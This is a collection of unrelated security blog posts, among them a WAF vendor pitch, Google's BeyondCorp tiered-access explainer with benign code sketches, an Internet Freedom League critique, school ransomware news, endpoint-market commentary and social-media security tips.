The good news is most companies today have an established process for working with independent security researchers. When coordinated disclosure programs become part of an overall software security strategy along with a DevSecOps program that integrates security testing right into the development process, we all benefit from the software powering our world being more secure.

See highlights from the report’s findings in the infographic below.


What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF?

Website owners rely on web hosting providers to get their websites up and running online. 

But here’s the thing that may trip up some website owners: hosting providers are only responsible for protecting the server on which websites are hosted; customers need to protect their own websites within the server. 

Bottom line: Web hosting providers are not responsible for the security of websites themselves.

What some web hosting providers may not realize is that the level of security that a web hosting service offers is extremely important to a prospective customer.

Depending on their needs, customers may be looking to see whether a web hosting provider offers SSL, backups, DDoS mitigation, firewalls, and more. 

Web hosting providers may choose instead to focus on offering content management systems (WordPress, Drupal, Joomla etc.) rather than any web security tools. 

This blog post will discuss some of the concerns web hosting providers may have in partnering with a security vendor specifically to offer a WAF (Web Application Firewall). What are some barriers to entry and how can Cloudbric make the transition smoother compared to other WAF vendors?

1) Steep learning curve 

First, web hosting providers may be worried about the deployment and management requirements that come with installing and utilizing a WAF. 

Before they can extend security to their customers, web hosters are faced with a slight learning curve when configuring a WAF for the first time or when creating custom policy rules that fit their security needs.

Regardless of the WAF vendor that a web hoster ultimately partners with, there will be some kind of learning curve. Luckily WAF security vendors like Cloudbric seek to minimize management requirements by providing flexible deployment models.

With API integrations available for web hosting providers, these companies can easily integrate Cloudbric’s APIs into their WAF service sign-up process to offer WAF as an add-on security service within their hosting plans. 

2) Perceived need for multiple security personnel to deploy and maintain a WAF

Web hosting providers profit primarily from hosting websites on their servers. They have thousands of clients to manage and keep happy.

Some of their responsibilities include guaranteeing high reliability/uptime in addition to providing technical support. 

Depending on the size of the web hosting firm, web hosters may feel like they need a big security team to deploy and maintain a WAF. However, many security vendors out there, such as Cloudbric, offer fully managed WAFs. 

The management overhead of a WAF can be very low, allowing IT personnel to just “set it and forget it.” This means web hosters do only minimal work but still benefit from an additional source of monthly revenue by extending web application security to their customers.

3) Complex UI/UX

UI/UX is extremely important to almost every software user out there. For WAFs, it’s no different. Most web hosting providers want a seamless experience when using a WAF console in order to manage customers and disseminate threat information easily. 

Furthermore, end users themselves should be able to log in to their own dashboards, understand the web attacks against them, and perform basic security settings such as IP blocking.

One added benefit for web hosting providers is expending far fewer resources to reach those insights.

Cloudbric’s user-friendly WAF console makes it easy for web hosting providers to manage all client websites.

Learn more by requesting a demo with Cloudbric. 

4) Upkeep costs

For web hosters, there is always the fear of additional upkeep costs, upgrades, and other “hidden” costs.

Most web hosters are interested in making a return on investment (ROI) but will need to consider the total cost of ownership should they choose to provide WAF to their customers as an add-on security service. 

(Contact us to get a quote and see for yourself how Cloudbric offers the cheapest WAF compared to other vendors.)

The total cost of ownership includes more than just the product purchase. For WAFs, there might be installation fees and upkeep fees to worry about. Upkeep costs may include hardware or software updates. 

Fortunately, with cloud-based options like Cloudbric, there is zero hardware required to install or maintain an exclusive WAF. 

Furthermore, there is no need to worry about management costs such as day-to-day tasks including any configurations, policy updates etc. Cloudbric’s security team of experts can handle all of this for web hosting providers. 

Finally, signature updates for the WAF technology itself are also not necessary because Cloudbric uses signature-free and AI techniques to detect threats.


For web hosting companies with low profit margins, adding complementary security services to their paid hosting plans can create new streams of revenue. 

Web hosting companies may be interested in distributing WAF to their customers but are hesitant to do so due to perceived barriers to entry. 

However, as we explored in this blog post, these barriers, such as the need for a specialized security team, complex UI/UX, and upkeep costs, can all be addressed with the right WAF vendor.

If you’re a web hosting service provider and you’d like to talk to one of our security experts in more detail, fill out the form below! No commitments whatsoever. 


The post What Are Some Barriers That Web Hosting Providers Face in Deploying a WAF? appeared first on Cloudbric.

YouTube’s fine and child safety online | Letters

Fining YouTube for targeting adverts at children as if they were adults shows progress is being made on both sides of the Atlantic, writes Steve Wood of the Information Commissioner’s Office

The conclusion of the Federal Trade Commission investigation into YouTube’s gathering of young people’s personal information (‘Woeful’ YouTube fine for child data breach, 5 September) shows progress is being made on both sides of the Atlantic towards a more child-friendly internet. The company was accused of treating younger users’ data in the same way it treats adult users’ data.

YouTube’s journey sounds similar to many other online services: it began targeting adults, found more and more children were using its service, and so continued to take commercial advantage of that. But the allegation is it didn’t treat those young people differently, gathering their data and using it to target content and adverts at them as though they were adult users.


How Google adopted BeyondCorp: Part 3 (tiered access)


This is the third post in a series of four, in which we set out to revisit various BeyondCorp topics and share lessons that were learnt along the internal implementation path at Google.

The first post in this series focused on providing necessary context for how Google adopted BeyondCorp, Google’s implementation of the zero trust security model. The second post focused on managing devices - how we decide whether or not a device should be trusted and why that distinction is necessary. This post introduces the concept of tiered access, its importance, how we implemented it, and how we addressed associated troubleshooting challenges.

High level architecture for BeyondCorp

What is Tiered Access?

In a traditional client certificate system, certificates are only given to trusted devices. Google used this approach initially as it dramatically simplified device trust. With such a system, any device with a valid certificate can be trusted. At predefined intervals, clients prove they can be trusted and a new certificate is issued. It’s typically a lightweight process and many off-the-shelf products exist to implement flows that adhere to this principle.

However, there are a number of challenges with this setup:
  • Not all devices need the same level of security hardening (e.g. non-standard issue devices, older platforms required for testing, BYOD, etc.).
  • These systems don’t easily allow for nuanced access based on shifting security posture.
  • These systems tend to evaluate a device based on a single set of criteria, regardless of whether devices require access to highly sensitive data (e.g. corporate financials) or far less sensitive data (e.g. a dashboard displayed in a public space).
The next challenge introduced by traditional systems is the inherent requirement that a device must meet your security requirements before it can get a certificate. This sounds reasonable on paper, but it unfortunately means that existing certificate infrastructure can’t be used to aid device provisioning. This implies you must have additional infrastructure to bootstrap a device into a trusted state.

The most significant challenge is the large amount of time between trust evaluations. If you only install a new certificate once a year, it might take an entire year before you are able to recertify a device. Therefore, any new requirements you wish to add to the fleet may take up to a year before they are fully in effect. On the other hand, if you require certificates to be installed monthly or daily, you place a significant burden on your users and/or support staff, as they are forced to go through the certificate issuance process far more often, which can be time-consuming and frustrating. Additionally, if a device is found to be out of compliance with security policy, the only option is to remove all access by revoking the certificate, rather than degrading access, which can create a frustrating all-or-nothing situation for the user.

Tiered access attempts to address all these challenges, which is why we decided to adopt it. In this new model, certificates are simply used to provide the device’s identity, instead of acting as proof of trust. Trust decisions are then made by a separate system which can be modified without interfering with the certificate issuance process or validity. Moving the trust evaluation out-of-band from the certificate issuance allows us to circumvent the challenges identified above in the traditional system. Below are three ways in which tiered access helps address these concerns.

Different access levels for different security states

By separating trust from identity, we could define infinite levels of trust if we so desired. At any point in time, we can define a new trust level, or adjust existing trust level requirements, and reevaluate a device's compliance. This is the heart of the tiered access system. It gives us the flexibility to set different device trust criteria for low-sensitivity applications than for highly trusted applications.
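To make the separation concrete, here is a minimal sketch of the idea in code (our own illustration with invented device IDs and tier names, not Google's implementation): the certificate supplies only a stable device identity, while a separate, mutable store decides trust.

```python
from dataclasses import dataclass

@dataclass
class Certificate:
    device_id: str  # identity only: long-lived, rarely reissued

# Trust lives outside the certificate, so it can change at any
# time without touching certificate issuance or validity.
TRUST_DB = {
    "laptop-123": "highly_privileged",
    "tablet-456": "basic",
    "kiosk-789": "untrusted",
}

TIER_RANK = {"untrusted": 0, "basic": 1, "highly_privileged": 2}

def authorize(cert: Certificate, required: str) -> bool:
    """Look up the device's current tier by identity and compare it
    to the tier the requested resource demands."""
    tier = TRUST_DB.get(cert.device_id, "untrusted")
    return TIER_RANK[tier] >= TIER_RANK[required]

assert authorize(Certificate("laptop-123"), "basic")

# A posture change (e.g. missed patches) downgrades trust
# immediately, with no certificate revocation involved.
TRUST_DB["laptop-123"] = "untrusted"
assert not authorize(Certificate("laptop-123"), "basic")
```

Because the trust store is consulted on every access decision, changing it takes effect fleet-wide at once, which is the property the certificate-only model lacked.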

Solving the bootstrapping challenge

Multiple trust states enable us to use the system to initiate an OS installation. We can now allow access to bootstrapping (configuration and patch management) services based solely on whether we own the device. This enables provisioning to occur from untrusted networks, allowing us to replace the traditional IP-based checks.

Configurable frequency of trust evaluations

The frequency of device trust evaluation is independent from certificate issuance in a tiered access setup. This means you can evaluate trust as often as you feel necessary. Changes to trust definitions can be immediately reflected across the entire fleet. Changes to device posture can similarly immediately impact trust.

We should note that the system’s ability to quickly remove trust from devices can be a double-edged sword. If there are bugs in the trust definitions or evaluations themselves, they can just as quickly remove trust from ‘good’ devices. You must have the ability to adequately test policy changes to mitigate the blast radius from these types of bugs, and ideally canary changes to subsets of the fleet for a baking period. Constant monitoring is also critical: a bug in your trust evaluation system could cause it to start mis-evaluating trust, so it’s wise to add alarms if the system starts dropping (or raising) the trust of too many machines at once. The troubleshooting section below provides additional techniques to help minimize the impact of misconfigured trust logic.

How did we define access tiers?

The basic concept of tiers is relatively straightforward: access to data increases as device security hardening increases. These tiers are useful for coarse-grained access control of client devices, which we have found to be sufficient in most cases. At Google, we allow users to choose the device tier, letting them weigh access needs against security requirements and policy. If a user needs access to more corporate data, they may have to accept more device configuration restrictions. If a user wants more control over their device and fewer restrictions, but doesn’t need access to higher-risk resources, they can choose a tier with less access to corporate data. For more information about the properties of a trusted platform you can measure, see our paper about Maintaining a Healthy Fleet.

We knew this model would work in principle, but we didn’t know how many access tiers we should define. As described above, the old model only had two tiers: Trusted and Untrusted. We knew we wanted more than that to enable trust build up at the very least, but we didn’t know the ideal number. More tiers allow access control lists to be specified with greater fidelity at the cost of confusion for service owners, security engineers, and the wider employee base alike.

At Google, we initially supported four distinct tiers ranging from Untrusted to Highly-Privileged Access. The extremes are easy to understand: Untrusted devices should only access data that is already public while Highly-Privileged Access devices have greater privilege internally. The middle two tiers allowed system owners to design their systems with the tiered access model in mind. Certain sensitive actions required a Highly-Privileged Access device while less sensitive portions of the system could be reached with less trusted devices. This degraded access model sounded great to us security wonks. Unfortunately, employees were unable to determine what tier they should choose to ensure they could access all the systems they needed. In the end, we determined that the extra middle tier led to intense confusion without much benefit.

In our current model, the vast majority of devices fit in one of three distinct tiers: Untrusted, Basic Access, and Highly-Privileged Access. In this model, system owners are required to choose the more trusted path if their system is more sensitive. This requirement does limit the finesse of the system but greatly reduces employee confusion and was key to a successful adoption.

In addition to tiers, our system is able to provide additional context to access gateways and underlying applications and services. This additional information is useful to provide finer grained, device-based access control. Imposing additional device restrictions on highly sensitive systems, in addition to checking the coarse grain tier, is a reasonable way to balance security vs user expectations. Because highly sensitive systems are only used by a smaller subset of the employee population, based on role and need, these additional restrictions typically aren’t a source of user confusion. With that in mind, please note that this article only covers device-based controls and does not address fine-grained controls based on a user’s identity.

At the other end of the spectrum, we have OS installation/remediation services. These systems are required in order to support bootstrapping a device which by design does not yet adhere to the Basic Access tier. As described earlier, we use our certificates as a device identity, not trust validation. In the OS installation case, no reported data exists, but we can make access decisions based on the inventory data associated with that device identity. This allows us to ensure our OS and security agents are only installed on devices we own and expect to be in use. Once the OS and security agents are up and running, we can use them to lock down the device and prove it is in a state worthy of more trust.

How did we create rules to implement the tiers?

Device-based data is the heart of BeyondCorp and tiered access. We evaluate trust tiers using data about each device at Google to determine its security integrity and tier level. To obtain this data, we built an inventory pipeline which aggregates data from various sources of authority within our enterprise to obtain a holistic, comprehensive view of a device's security posture. For example, we gather prescribed company asset inventory in one service and observed data reported by agents on the devices in other services. All of this data is used to determine which tier a device belongs in, and trust tiers are reevaluated every time corporate data is changed or new data is reported.

Trust level evaluations are made via "rules", written by security and systems engineers. For example, for a device to have basic access, we have a rule that checks that it is running an approved operating system build and version. For that same device to have highly-privileged access, it would need to pass several additional rules, such as checking the device is encrypted and contains the latest security patches. Rules exist in a hierarchical structure, so several rules can combine to create a tier. Requirements for tiers across device platforms can be different, so there is a separate hierarchy for each. Security engineers work closely with systems engineers to determine the necessary information to protect devices, such as determining thresholds for required minimum version and security patch frequency.
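The rule hierarchy might look something like the following sketch (the rules, OS builds, and thresholds are hypothetical, chosen only to illustrate how rules combine into tiers):

```python
# Each rule inspects data reported about a device.
def approved_os(device):
    return device["os_build"] in {"stable-114", "stable-115"}

def encrypted(device):
    return device["disk_encrypted"]

def patched(device):
    return device["days_since_patch"] <= 30

# Hierarchy: a higher tier requires every rule of the tiers
# below it plus its own additional rules.
TIER_RULES = {
    "basic": [approved_os],
    "highly_privileged": [approved_os, encrypted, patched],
}

def evaluate_tier(device) -> str:
    """Return the highest tier whose rules the device satisfies;
    rerun whenever inventory or reported data changes."""
    tier = "untrusted"
    for name in ("basic", "highly_privileged"):
        if all(rule(device) for rule in TIER_RULES[name]):
            tier = name
    return tier

device = {"os_build": "stable-115",
          "disk_encrypted": True,
          "days_since_patch": 12}
assert evaluate_tier(device) == "highly_privileged"
```

A separate hierarchy per device platform, as the text describes, would simply mean one such rule table per OS.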

Rule Enforcement and User Experience

To create a good user experience, rules are created and monitored before being enforced. For example, before requiring all users to upgrade their Chrome browser, we monitor how many users would lose trust if that rule were enforced. Dashboards track rule impact on Googlers over 30-day periods. This enables security and systems teams to evaluate the impact of rule changes before they affect end users.

To further protect the employee experience, we have two measures: grace periods and exceptions. Grace periods provide windows of a predefined duration during which devices can violate rules but still maintain trust and access, providing a fallback in case of unexpected consequences. Grace periods can also be implemented quickly and easily across the fleet for disaster recovery purposes. The other mechanism is exceptions. Exceptions allow rule authors to create rules for the majority while enabling security engineers to make nuanced decisions around individual, riskier processes. For example, if we have a team of Android developers specializing in user experience for an older Android version, they may be granted an exception to the minimum version rule.
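One way to picture how grace periods and exceptions layer on top of rule evaluation (again a sketch of our own, with hypothetical device fields and a hypothetical minimum-version rule):

```python
from datetime import date

def rule_violated(device) -> bool:
    # Hypothetical minimum-version rule.
    return device["android_version"] < 12

def loses_trust(device, today: date) -> bool:
    """A violated rule only costs trust once any grace period has
    lapsed and no exception covers the device."""
    if not rule_violated(device):
        return False
    if device.get("exception_for") == "min_version_rule":
        # e.g. a team developing for older Android versions
        return False
    grace_until = device.get("grace_until")
    if grace_until is not None and today <= grace_until:
        return False  # still inside the fallback window
    return True

dev = {"android_version": 10, "grace_until": date(2019, 9, 30)}
in_grace = loses_trust(dev, date(2019, 9, 15))      # window still open
lapsed = loses_trust(dev, date(2019, 10, 15))       # window closed

exempt = {"android_version": 10, "exception_for": "min_version_rule"}
excepted = loses_trust(exempt, date(2019, 10, 15))  # exception applies
```

The ordering matters: exceptions are checked before grace periods so that an exempted device never starts a countdown at all.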

How did we simplify troubleshooting?

Troubleshooting access issues proves challenging in a system where many pieces of data interact to create trust. We tackle this issue in two ways. First, we have a system to provide succinct and actionable explanations to end users on how to resolve problems on their own. Second, we have the capability to notify users when their devices have lost trust or are about to lose trust. The combination of these efforts improves the user experience of the tiered access solution and reduces toil for those supporting it.

We are able to provide self-service feedback to users by closely integrating the creation of rule policy with resolution steps for that policy. In other words, security engineers who write rule policies are also responsible for attaching steps on how to resolve the issue. To further aid users, the rule evaluation system provides details about the specific pieces of data causing the failure. All this information is fed into a centralized system that generates user-friendly explanations, guiding users to self-diagnose and fix problems without the need for IT support. There are also cases where details must be withheld: a support technician, for example, may not be able to see pieces of PII about a user when helping fix the device. These cases are rare but necessary to protect the parties involved. Having one centralized debugging system helps deal with all these nuances, enabling us to provide detailed and safe explanations to end users in accordance with their needs.

Remediation steps are communicated to users in several ways. Before a device loses trust, notification pop-ups appear explaining that a loss of access is imminent. These pop-ups contain directions to the remediation system so the user can self-diagnose and fix the problem, heading off user pain by offering solutions before the problem has an impact. These advance notifications work in conjunction with the aforementioned grace periods, as we provide a window in which users can fix their devices. If the issue is not fixed and the device goes out of compliance, there is still a clear path forward. For example, when a user attempts to access a resource for which they do not have permission, a link appears on the access-denied page directing them to the relevant remediation steps. This provides fast, clear feedback on how to fix the device and reduces toil for the IT support teams.

Next time

In the next and final post in this series, we will discuss how we migrated services to be protected by the BeyondCorp architecture at Google.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

Thank you to the editors of the BeyondCorp blog post series, Puneet Goel (Product Manager), Lior Tishbi (Program Manager), and Justin McWilliams (Engineering Manager).

Five Thoughts on the Internet Freedom League

In the September/October issue of Foreign Affairs magazine, Richard Clarke and Rob Knake published an article titled "The Internet Freedom League: How to Push Back Against the Authoritarian Assault on the Web," based on their recent book The Fifth Domain. The article proposes the following:

The United States and its allies and partners should stop worrying about the risk of authoritarians splitting the Internet. 

Instead, they should split it themselves, by creating a digital bloc within which data, services, and products can flow freely, excluding countries that do not respect freedom of expression or privacy rights, engage in disruptive activity, or provide safe havens to cybercriminals...

The league would not raise a digital Iron Curtain; at least initially, most Internet traffic would still flow between members and nonmembers, and the league would primarily block companies and organizations that aid and abet cybercrime, rather than entire countries. 

Governments that fundamentally accept the idea of an open, tolerant, and democratic Internet but that struggle to live up to such a vision would have an incentive to improve their enforcement efforts in order to join the league and secure connectivity for their companies and citizens. 

Of course, authoritarian regimes in China, Russia, and elsewhere will probably continue to reject that vision. 

Instead of begging and pleading with such governments to play nice, from now on, the United States and its allies should lay down the law: follow the rules, or get cut off.

My initial reaction to this line of thought was not positive. Rather than continue exchanging Twitter messages, Rob and I had a very pleasant phone conversation to help each other understand our points of view. Rob asked me to document my thoughts in a blog post, so this is the result.

Rob explained that the main goal of the IFL is to create leverage to influence those who do not implement an open, tolerant, and democratic Internet (summarized below as OTDI). I agree that leverage is certainly lacking, but I wondered if the IFL would accomplish that goal. My reservations included the following.

1. Many countries that currently reject the OTDI might only be too happy to be cut off from the Western Internet. These countries do not want their citizens accessing the OTDI. Currently dissidents and others seeking news beyond their local borders must often use virtual private networks and other means to access the OTDI. If the IFL went live, those dissidents and others would be cut off, thanks to their government's resistance to OTDI principles.

2. Elites in anti-OTDI countries would still find ways to access the Western Internet, whether for personal, business, political, military, or intelligence reasons. The common person would be most likely to suffer.

3. Segregating the OTDI would increase the incentives for "network traffic smuggling," whereby anti-OTDI elites would compromise, bribe, or otherwise corrupt Western Internet resources to establish surreptitious methods to access the OTDI. This would increase the intrusion pressure upon organizations with networks in OTDI and anti-OTDI locations.

4. Privacy and Internet freedom groups would likely strongly reject the idea of segregating the Internet in this manner. They are vocal and would apply heavy political pressure, similar to recent net neutrality arguments.

5. It might not be technically possible to segregate the Internet as desired by the IFL. Global business does not neatly differentiate between Western and anti-OTDI networks. Similar to the expected resistance from privacy and freedom groups, I expect global commercial lobbies to strongly reject the IFL on two grounds. First, global businesses cannot disentangle themselves from anti-OTDI locations, and second, Western businesses do not want to lose access to markets in anti-OTDI countries.

Rob and I had a wide-ranging discussion, but these five points in written form provide a platform for further analysis.

What do you think about the IFL? Let Rob and me know on Twitter, via @robknake and @taosecurity.

Why Are Schools Increasingly Targeted by Cyberattackers?

Schools, including universities, are increasingly becoming cyberattack targets. Just this month, the Monroe-Woodbury school district in Orange County, NY had to delay the start of school due to cyberattacks. And this incident was only one of a handful of cyberattacks on New York state school districts this summer. One school system, Rockville Centre in Nassau County, paid a cyberattacker $88,000 after a ransomware attack shut down the district’s mainframe.

And New York is not alone. This summer, school districts in Oklahoma, New York, and Virginia have been victims of ransomware. The Louisiana governor declared a state of emergency after multiple ransomware attacks crippled several school districts, and schools in Flagstaff, AZ closed for two days this month due to a ransomware attack.

The attacks don’t stop after grade 12 either. Two universities, Regis University in Denver, CO and Stevens Institute of Technology in Hoboken, NJ, were also targeted right before the start of this school year.

Anthony Carfora of the Lupinskie Center for Curriculum, Instruction and Technology said in an interview with CBS New York, “Ransomware is prolific right now and there’s more of it going on in government and education institutions than in private industry. We seem to be targets now.”

Why are schools being targeted?

Schools’ appeal to cyberattackers stems, in part, from the fact that most don’t have robust cybersecurity systems or personnel and struggle to prevent and respond to attacks. They have the added challenge of needing to give their students and teachers the academic freedom to learn and explore and do research. This often requires a more lax security posture than the locked down environment of an enterprise. They also house a lot of sensitive data, and are heavily reliant on software.

Another wrinkle: the users of that software might find it worthwhile to take a look under the hood. Veracode co-founder Chris Wysopal notes that, “schools use a lot of applications, which put them at the mercy of their vendors to build secure software, and requires that they have a good coordinated disclosure process to respond to security researchers, who in their case are often going to be students.”

Just last month at DEF CON, a teenager presented on all the vulnerabilities he found over the past three years in his school’s educational software. Wired reported that the teen “found a series of common web bugs in [the software], including so-called SQL-injection and cross-site-scripting vulnerabilities … those bugs ultimately allowed access to a database that contained 24 categories of data, everything from phone numbers to discipline records, bus routes, and attendance records.”

After he reported the flaws to the two software companies, he got little to no response. That is, until he used one of the vulnerabilities to trigger a push notification saying “hello” to all users. The software companies responded, and one has stated that it’s working to improve its vulnerability disclosure program.

Steps schools can take

Beyond working with vendors to ensure the security of software they are purchasing, and developing robust vulnerability disclosure programs, Wysopal recommends that schools consider “separating the administration network, which has the sensitive data the school needs to operate, from the teaching or lab network, where this data isn’t needed.” In this way, the school can maintain the academic freedoms while compartmentalizing data to reduce risk.

Want more security news and best practices? Subscribe to our content.

The Endpoint security market is booming

Endpoint security is the fastest-growing category in cybersecurity, no doubt in response to growing threats.

Of all the categories in the cybersecurity world, one stands out in terms of sales volume and growth.

Endpoint security products (also known as EPPs, endpoint protection platforms) are designed to secure laptops, desktops, and servers from malware. There are several reasons for the rapid growth of this particular product category. The first is the rise in financially motivated attacks against endpoints: ransomware attacks (which target endpoints) have doubled in the last 12 months. When an organization is under attack, the most vulnerable assets are usually the endpoints, which host the data and give attackers a foothold from which to reach other endpoints and servers, identify valuable data, and encrypt it.

Ransomware and Cryptominers are the biggest threats

In addition to ransomware, other forms of malware that target endpoints are on the rise, mainly crypto-miners, which use computing resources to produce cryptocurrency (mainly Monero). Crypto-mining campaigns climbed 29 percent from Q4 2018 to Q1 2019. One infamous example of this trend is the discovery and takedown of a huge botnet consisting of 850,000 computers. The machines were infected with the polymorphic miner “RETADUP”, which used their resources to mine Monero. Similarly, the Smominru campaign hijacked half a million PCs to mine cryptocurrency. That botnet has been active for at least two years and generally spreads through the EternalBlue exploit.

Organizations are aware of this growing, frightening trend and are responding by deploying endpoint solutions to secure themselves. The endpoint security market is growing at an annual rate of 8%, from a total size of 6.5 billion USD in 2018 to an estimated 13 billion by 2022.

Endpoint security products integrate with the organization’s security apparatus, which begins at the perimeter (firewall, WAF), moves through the network (NTA), and terminates at the endpoints. Gartner defines EPP as “solutions deployed on endpoint devices to harden endpoints, to prevent malware and malicious attacks, and to provide…investigation and remediation capabilities.” EPP systems are gradually replacing legacy anti-virus systems: while both products serve the same purpose, AV is signature-based (meaning it is only useful for detecting known malware), whereas EPP can identify and block new malware variants and zero-days.

The endpoint security market isn’t simply growing in overall size; it is also very profitable and enjoys sizeable deals (given that enterprises have thousands of endpoints to secure). Last year, BlackBerry acquired Cylance, one of the main vendors, for 1.4 billion USD. Carbon Black IPO’d and was then sold to VMware for 2.1 billion, and CrowdStrike, which IPO’d in June 2019, has since seen a 150% rise in its stock price, propelling it to the no. 3 cybersecurity company in the world, ahead of established companies such as Check Point, Symantec and others.


Israeli Endpoint Security solution vendors

In the Israeli cyber market, the trend is similar. Several startups have identified this opportunity and developed endpoint security solutions, among them Nyotron, enSilo, and Minerva Labs. All of these companies have raised tens of millions of USD and are trying to battle the huge companies overseas. The leading Israeli company is SentinelOne, which was founded in 2013 and has raised 230 million USD since. The company has an Israeli R&D center, headquarters in Silicon Valley, and a large sales office in Oregon. It has 2,500 global clients and annual revenue close to 100 million USD. Gartner has included SentinelOne in its prestigious “Magic Quadrant” research on endpoint security solutions, hailing it as a “Visionary” positioned furthest for completeness of vision (and the only Israeli endpoint security company to be included in the report). The SentinelOne platform does not require any prior knowledge about an attack in order to identify the malware, thanks to intelligent machine-learning algorithms and continuously improved engines. SentinelOne uses several engines to ensure proper monitoring, identification, blocking, and mitigation, and enables defenders to quickly remediate, report, and investigate an incident. SentinelOne’s automatic rollback is extremely useful in the event of a ransomware attack. The company is now extending the “endpoint” security concept to new devices such as IoT devices and to cloud security.





The post The Endpoint security market is booming appeared first on CyberDB.


The Internet has made our lives easier in so many ways, but you need to know how to protect your privacy and avoid fraud. With all of the personally identifiable information we share on social sites, hackers have only become more adept at locating that information and using it to gain access to our accounts.

What’s worse, if you’re on social media while at work and connected to the corporate network and your account gets hacked, you’ve now made your entire company vulnerable.

Social media represents the largest modern threat vector: it has more connectivity (billions of people), more trust (everyone is your friend), and less visibility (simply by its nature) than any other communication or business platform.

Security teams need to join their sales, marketing and customer success groups in the digital era, follow social media security best practices and implement risk monitoring and remediation technology around social media to secure their organization’s future.

In the case of social media accounts, you should make absolutely sure the email they are linked to has as much protection as possible. It’s a single point of failure, since everyone gets their password reset emails there. That’s the major way people get in.

Tips for Securing your Social Media Accounts
Create a unique email for social media. If you are compromised, hackers won’t have access to any other valuable information.

Limit Biographical Information. Many social media websites require biographical information to open an account –You can limit the information made available to other social media users.

Enable two-factor authentication. This is one of the best methods for protecting your accounts from unauthorized access.

Close unused accounts. With security, you can’t take the approach of ‘out of sight, out of mind,’ so it’s best to terminate your account altogether if it’s no longer in use.

Update mobile apps regularly. These updates can protect you from threats that have already been identified.

Practice good password hygiene. Pick a “strong” password, keep it secure, change it frequently, and use different passwords for different accounts.

Monitor your accounts regularly. The sooner you notice suspicious activity, the sooner you can recover your account.

Secure your mobile devices. If your mobile devices are linked to your social media accounts, make sure that these devices are password protected in case they are lost or stolen.

Adjust the default privacy settings. Lock down your account from the start. Select who can see which posts and when, and what information is shown on your profile, and to whom.

Be mindful accessing accounts on public wireless. If you have to connect, log completely out of your account after your session.

Accept friend requests selectively. There is no obligation to accept a “friend” request of anyone you do not know or do not know well. Fake accounts are often used in social engineering.

Use caution with public computers or wireless connections. Try to avoid accessing your social media accounts on public or other shared computers. But if you must do so, remember to log out completely by clicking the “log out” button on the social media website to terminate the online session.

Limit 3rd party app usage. Only authorize legitimate applications, and be sure to read the details of what you are authorizing the particular app to have access to.

What do I do If I’ve Been Hacked?
First things first, don’t panic. If possible, log into your account and change your password.
Review the recent activity on the account and delete anything that was not posted by you.

If you find spam, be sure to report it.

Check your bank account and other accounts to ensure that they were not also compromised.

At this point, enable two-factor authentication.

In addition, you should know that social media platforms provide support to help you recover your account.

Major Web Hosting Hazards You Should Take Seriously

“I’ve read on my web hosting provider’s website that they have a good security solution in place to protect me against hackers.”

This is a pretty common answer that a lot of bloggers and small business owners give me when I ask them how secure their web hosting is. They often add that their budgets are pretty tight, so they’ve chosen to go with “an affordable provider.” By “affordable,” of course, they mean “ridiculously cheap.”

Come on, people.

Do you really think that a cheap web hosting provider has everything in place to stop a website attack? Do you think that it will protect you from all types of hacker attacks?

While I don’t know everything about how web hosting providers choose security solutions, I can tell you with some confidence that a lot of them have laughable solutions.

If you don’t believe me, Google something like “hacked website stories” and you’ll see that many web hosting companies, from some of the cheapest to even some well-known ones, don’t have adequate security solutions in place. As a result, lots of people have lost their websites; these horror stories are quite common.

Shocking Stats

Unfortunately, hackers are becoming more and more skilled at what they do, and stats support this. If you visit the live counter of hacked websites on Internet Live Stats, you’ll discover that at least 100,000 websites are hacked DAILY (for example, I visited the counter at 7:07 pm and it showed that 101,846 websites have been hacked since 12 am).

From what I saw on Internet Live Stats, I could tell that one website was hacked every second. This is horrible, and one of the bad things about this was that many of the owners of these websites thought that they were protected by their web hosting provider.

The next bad thing about all of this is that the number of websites hacked daily is getting higher. For example, there were about 30,000 websites hacked a day in 2013 according to this Forbes piece, but as we could see on the live counter, this number has more than tripled in 2019. If this negative trend continues, then we could easily see even more website owners losing their business on a daily basis very soon.
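A quick back-of-the-envelope check shows that the two figures above, roughly 100,000 hacks per day and about one per second, are consistent:

```python
# Sanity check: ~100,000 sites hacked per day is just over one per second.
hacked_per_day = 100_000
seconds_per_day = 24 * 60 * 60  # 86,400

rate = hacked_per_day / seconds_per_day
print(f"{rate:.2f} sites hacked per second")  # → 1.16 sites hacked per second
```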

While this information is certainly alarming, website owners are typically to blame for the fact that their website was stolen from them (not trying to be rude here at all). If we dig a little bit deeper into the data on hacked websites, we discover that many use ridiculously simple passwords, poor hosting providers, outdated content management systems (CMS), and do other unwise things that help hackers get in.

For example, many bloggers want to focus on content writing, editing, and lead building rather than think about stuff like hosting. While content proofreading is something they can get help with from numerous online tools like Grammarly and Hemingway Editor, getting quality assistance with a hacked website is a whole new ballgame.

Next, there’s an issue with passwords. According to a recent survey by the UK’s National Cyber Security Centre (NCSC), 23.2 million web accounts they’ve analyzed had “123456” as a password. Moreover, about 7.7 million people relied on “123456789” for protection of their data, while “password” and “qwerty” were also quite popular with about 3 million users each.

While a password is something that can be changed in a matter of seconds to protect your site against brute-force attacks, it may not protect you from most cyber threats. Those are the responsibility of a hosting provider, and unfortunately, a lot of people disregard this aspect of web security.

That’s why we’re going to talk about hosting security issues that you should protect your site from.

How Web Hosting Affects the Security of Your Website

Before we talk about major web hosting hazards, let’s quickly discuss the connection between the security of your website and the web hosting you’re using. I’m going to say this right away: choosing a web hosting provider is one of the most important decisions you’ll make when setting up your website, and the implications go way beyond security.

For example, if you’re a blogger or a business owner and you choose a good provider, you’ll get:

  • A high level of protection against hackers. “This means that you’ll be able to concentrate on content creation,” says Peter O’Brien, a content specialist from Studicus. “If I selected a poor host, I wouldn’t spend so much time doing the creative stuff, that’s for sure.”
  • A fast loading time. People don’t like to wait; in fact, Google claims that websites that load within 5 seconds have 70 percent longer visitor sessions, 35 percent lower bounce rates, and 25 percent higher viewability compared to websites that load in between 5 and 19 seconds. That’s why Google has released the mobile-first indexing update and designed its own PageSpeed Insights tool to help users optimize the performance of their websites.
  • High reliability and uptime. Most web hosting companies claim that the websites they service are online 99.9 percent of the time, but the real figure can vary and depends on the quality of the provider.
  • Better security. Different web hosting providers offer different security packages, so the websites they power have different levels of protection from hackers. Moreover, a good host can help you recover quickly in case you’ve suffered an attack.

Let’s talk a little bit more about the last bullet point. So, how can one tell that their hosting provider is poor? That’s pretty easy:

  • Slow loading times. If your website takes more than five seconds to load, chances are that its performance is affected by a hosting provider that has put too many sites on one server.
